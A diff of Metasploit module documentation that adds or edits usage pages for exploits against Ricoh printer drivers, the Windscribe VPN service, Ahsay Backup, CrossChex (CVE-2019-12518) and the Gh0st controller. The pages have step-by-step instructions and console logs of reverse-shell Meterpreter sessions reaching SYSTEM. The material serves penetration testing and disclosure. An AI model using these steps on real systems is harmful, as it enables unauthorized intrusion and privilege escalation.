@@ -58,7 +58,7 @@ Payload options (windows/x64/meterpreter/reverse_tcp):
   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
   LPORT     4545             yes       The listen port

-   **DisablePayloadHandler: True   (RHOST and RPORT settings will be ignored!)**
+   **DisablePayloadHandler: True   (no handler will be created!)**


 Exploit target:
@@ -0,0 +1,97 @@
+## Vulnerable Application
+
+  [Various Ricoh printer drivers](https://www.ricoh.com/info/2020/0122_1/list) allow escalation of
+  privileges on Windows systems.
+
+  For vulnerable drivers, a low-privileged user can
+  read/write files within the `RICOH_DRV` directory
+  and its subdirectories.
+
+  `PrintIsolationHost.exe`, a Windows process running
+  as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
+  during the installation of a printer. A user can
+  elevate to SYSTEM by writing a malicious DLL to
+  the vulnerable driver directory and adding a new
+  printer with a vulnerable driver.
+
+  Multiple runs of this module may be required
+  given successful exploitation is time-sensitive.
+
+## Verification Steps
+
+  1. Install a vulnerable Ricoh driver
+  2. Start msfconsole
+  3. Get a session with basic privileges
+  4. Do: ```use exploit/windows/local/ricoh_driver_privesc```
+  5. Do: ```set SESSION <sess_no>```
+  6. Do: ```run```
+  7. You should get a shell running as SYSTEM.
+
+## Scenarios
+
+### Tested on Ricoh PCL6 Universal Driver `v4.13`
+
+  ```
+  msf5 > use multi/handler
+  msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
+  payload => windows/x64/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [*] Sending stage (206403 bytes) to 192.168.37.199
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.199:49670) at 2020-02-06 12:47:59 -0600
+
+  meterpreter > getuid
+  Server username: DESKTOP-A97LIDN\ricoh-test
+  meterpreter > sysinfo
+  Computer        : DESKTOP-A97LIDN
+  OS              : Windows 10 (10.0 Build 16299).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x64/windows
+  meterpreter > background
+  [*] Backgrounding session 1...
+  msf5 exploit(multi/handler) > use ricoh_driver_privesc
+
+  Matching Modules
+  ================
+
+     #  Name                                        Disclosure Date  Rank    Check  Description
+     -  ----                                        ---------------  ----    -----  -----------
+     0  exploit/windows/local/ricoh_driver_privesc  2020-01-22       normal  Yes    Ricoh Driver Privilege Escalation
+
+
+  [*] Using exploit/windows/local/ricoh_driver_privesc
+  msf5 exploit(windows/local/ricoh_driver_privesc) > set session 1
+  session => 1
+  msf5 exploit(windows/local/ricoh_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
+  payload => windows/x64/meterpreter/reverse_tcp
+  msf5 exploit(windows/local/ricoh_driver_privesc) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(windows/local/ricoh_driver_privesc) > check
+  [*] The target appears to be vulnerable. Ricoh driver directory has full permissions
+  msf5 exploit(windows/local/ricoh_driver_privesc) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [*] Adding printer JLFJCi...
+  [*] Sending stage (206403 bytes) to 192.168.37.199
+  [*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.199:49673) at 2020-02-06 12:48:40 -0600
+  [*] Deleting printer JLFJCi
+  [+] Deleted C:\Users\RICOH-~1\AppData\Local\Temp\GFHCkvh.bat
+  [+] Deleted C:\Users\RICOH-~1\AppData\Local\Temp\headerfooter.dll
+
+  meterpreter > getuid
+  Server username: NT AUTHORITY\SYSTEM
+  meterpreter > sysinfo
+  Computer        : DESKTOP-A97LIDN
+  OS              : Windows 10 (10.0 Build 16299).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x64/windows
+  ```
@@ -0,0 +1,81 @@
+## Description
+
+  The Windscribe VPN client application for Windows makes use of a
+  Windows service `WindscribeService.exe` which exposes a named pipe
+  `\\.\pipe\WindscribeService` allowing execution of programs with
+  elevated privileges.
+
+  Windscribe versions prior to 1.82 do not validate user-supplied
+  program names, allowing execution of arbitrary commands as SYSTEM.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on [Windscribe](https://windscribe.com/)
+  version 1.80 and 1.81 on Windows 7 SP1 (x64).
+
+  Download:
+
+  * https://assets.windscribe.com/desktop/win/Windscribe_1.80.exe
+  * https://assets.windscribe.com/desktop/win/Windscribe_1.81.exe
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/windows/local/windscribe_windscribeservice_priv_esc`
+  4. `set SESSION <SESSION>`
+  5. `check`
+  6. `run`
+  7. You should get a new *SYSTEM* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `%TEMP%`)
+
+
+## Scenarios
+
+### Windows 7 SP1 (x64)
+
+  ```
+  msf5 > use exploit/windows/local/windscribe_windscribeservice_priv_esc 
+  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > check
+  [*] The service is running, but could not be validated.
+  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set lhost 172.16.191.165
+  lhost => 172.16.191.165
+  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [*] Writing payload (283 bytes) to C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe ...
+  [*] Sending C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe to \\.\pipe\WindscribeService ...
+  [+] Opended \\.\pipe\WindscribeService! Proceeding ...
+  [*] Sending stage (180291 bytes) to 172.16.191.242
+  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.242:49365) at 2020-01-31 19:14:31 -0500
+  [-] Failed to delete C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe: stdapi_fs_delete_file: Operation failed: Access is denied.
+
+  meterpreter > getuid
+  Server username: NT AUTHORITY\SYSTEM
+  meterpreter > sysinfo
+  Computer        : TEST
+  OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x86/windows
+  meterpreter >
+  ```
+
@@ -1,14 +1,15 @@
 ## Vulnerable Application
+
  Ahsay Backup v7.x - v8.1.1.50
  Download the vulnerable version: `http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe`
  Start the application ( I start it manually from `C:\Program Files\AhsayCBS\bin\startup.bat`)
-  
+
 ## Verification Steps

  1. Start `msfconsole`
  2. `use exploit/windows/misc/ahsay_fileupload`
  3. enable create trial account `set CREATEACCOUNT true`
-  4. set RHOST `set RHOST 172.16.238.175` 
+  4. set RHOST `set RHOST 172.16.238.175`
  5. set LHOST `set LHOST 172.16.238.235`
  6. run exploit `run`
  7. We should receive a meterpreter shell.
@@ -22,12 +23,10 @@
   TARGETURI      - Path to Ahsay installation
   UPLOADPATH     - Path to where the file should be uploaded
   USERNAME       - Username to Ahsay account, if CREATEACCOUNT is set this username will be used.
-   
+
 ## Scenarios

-### Version of software and OS as applicable
-
-This exploit has been tested on Windows 2003 SP2.
+### Ahsay 8.1.1.50 on Windows 2003 SP2

  ```
 msf exploit(windows/misc/ahsay_fileupload) > set CREATEACCOUNT true
@@ -38,17 +38,16 @@
  6. `run`
  7. **Verify** Session opened

-
 ## Scenarios

-    msf5 > use exploit/windows/misc/ais_esel_server_rce 
+    msf5 > use exploit/windows/misc/ais_esel_server_rce
    msf5 exploit(windows/misc/ais_esel_server_rce) > set rhosts 10.66.75.212
    rhosts => 10.66.75.212
          msf5 exploit(windows/misc/ais_esel_server_rce) > check
          [+] 10.66.75.212:5099 - The target is vulnerable.
    msf5 exploit(windows/misc/ais_esel_server_rce) > run

-    [*] Started reverse TCP handler on 10.66.75.208:4444 
+    [*] Started reverse TCP handler on 10.66.75.208:4444
    [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
    [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
    [*] 10.66.75.212:5099 - Command Stager progress -   1.47% done (1499/102292 bytes)
@@ -0,0 +1,71 @@
+## Introduction
+
+CrossChex is a personnel identity verification, access control, and time
+attendance management system compatible with Windows 7,8 & 10. It uses
+UDP broadcasts to identify and connect with Access Control devices on a
+network. The code used to handle a response from an Access Control
+device is vulnerable to a Stack Buffer Overflow attack on CrossChex
+versions `Crosschex Standard x86 <= V4.3.12`. Tracked as CVE-2019-12518,
+and as such permits arbitrary code execution.
+
+The code used to overflow the Stack Buffer and code an attacker wishes
+to be executed as a result of the exploit are sent in a single UDP
+packet as a response to the CrossChex broadcast. As both the exploit and
+the payload must be contained inside a single UDP packet, an exploit has
+a maximum size of `8947 Characters`.
+
+This module exploits CVE-2019-12518 by listening for a CrossChex "new
+device" broadcast for a given number of seconds (`TIMEOUT`). It then
+responds with a UDP packet containing shellcode for both the Buffer
+Overflow exploit and the attacker's chosen payload. The `Space` payload
+option ensures no payload of too large a size is used to ensure
+successful exploitation. If a broadcast is not detected within the given
+`TIMEOUT`, the module exits with a warning.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use windows/misc/crosschex_device_bof`
+3. `set LHOST vboxnet0`
+4. `run`
+5. Open CrossChex
+6. Navigate to Device > Add
+7. Select `Search`
+8. Verify payload executes correctly
+
+## Options
+
+1.  `TIMEOUT` Seconds module waits for broadcast, defaults to `1000`.
+2.  `CHOST`. Address UDP packet response is sent from. Defaults to `0.0.0.0`.
+3.  `CPORT`. Port UDP packet response is sent from. Defaults to `5050` as CrossChex expects communication from this port.
+
+## Compatible Payloads
+
+Any basic x86 windows payload.
+
+## Payload Options
+
+As above.
+
+## Scenarios
+
+```
+msf5 exploit(windows/misc/crosschex_device_bof) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] CrossChex broadcast received, sending payload in response
+[*] Payload sent
+[*] Sending stage (180291 bytes) to 192.168.56.3
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49160) at 2020-02-10 16:21:13 +0000
+
+meterpreter > ls
+Listing: C:\Program Files\Anviz\CrossChex Standard
+==================================================
+...
+```
+
+## References
+
+1. <https://cvedetails.com/cve/CVE-2019-12518>
+2. <https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html>
+3. <https://www.exploit-db.com/exploits/47734>
@@ -2,7 +2,7 @@

  This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim.
  This vulnerability can allow remote code execution in the context of the user who ran it.
-  
+
  A vulnerable version of the software is available here: [gh0st 3.6](https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip)

 ## Verification Steps
@@ -17,7 +17,7 @@
 ## Options

  **MAGIC**
-  
+
  This is the 5 character magic used by the server.  The default is `Gh0st`

 ## Scenarios
--- a/Show More
+++ b/Show More